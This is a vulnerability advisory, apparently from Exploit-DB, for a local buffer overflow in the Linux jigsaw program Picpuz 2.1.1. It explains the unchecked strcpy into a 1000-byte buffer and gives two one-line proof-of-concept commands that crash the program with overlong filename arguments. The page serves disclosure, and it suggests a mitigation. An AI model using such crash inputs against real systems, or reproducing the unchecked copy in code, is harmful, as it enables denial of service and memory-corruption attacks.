Picpuz Buffer Overflow DoS/PoC

vendor:

Picpuz

by:

sandman, n4mdn4s [4T] gmail [D0T] com

3.3

CVSS

LOW

Buffer Overflow

120

CWE

Product Name: Picpuz

Affected Version From: <= 2.1.1

Affected Version To: <= 2.1.1

Patch Exists: NO

Related CWE: None

CPE: a:kornelix:picpuz

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Fedora 12

2009

Picpuz Buffer Overflow DoS/PoC <=2.1.1

Picpuz does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy. Proof Of Concept: Image filename overflow: $ ./picpuz -f $(python -c 'print "A"*1500') Directory filename overflow: $ ./picpuz -i $(python -c 'print "A"*1500')

Mitigation:

Input validation should be done to check the length of input filename/directory.

Source

Exploit-DB raw data:

# Exploit Title: Picpuz Buffer Overflow DoS/PoC <=2.1.1
# Date: 24 Dec, 2009
# Author: sandman, n4mdn4s [4T] gmail [D0T] com
# Software Link: http://kornelix.squarespace.com/picpuz/<http://kornelix.squarespace.com/printoxx/>, http://kornelix.squarespace.com/storage/downloads/picpuz-2.1.1.tar.gz<http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz>

# Version: <= 2.1.1
# Tested on: Fedora 12
# CVE: None
# Code:

Description:
"from website"
Picpuz is a free Linux "jigsaw puzzle" program.

You can take almost any image (jpeg, tiff, png ...) and scramble it into many pieces (tens to hundreds). You can

then reassemble the picture using the mouse to move the pieces around.


Vulnerability:
Picpuz does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy.


Proof Of Concept:
Image filename overflow:
$ ./picpuz -f $(python -c 'print "A"*1500')

Directory filename overflow:
$ ./picpuz -i $(python -c 'print "A"*1500')


Severity: Very Low

#$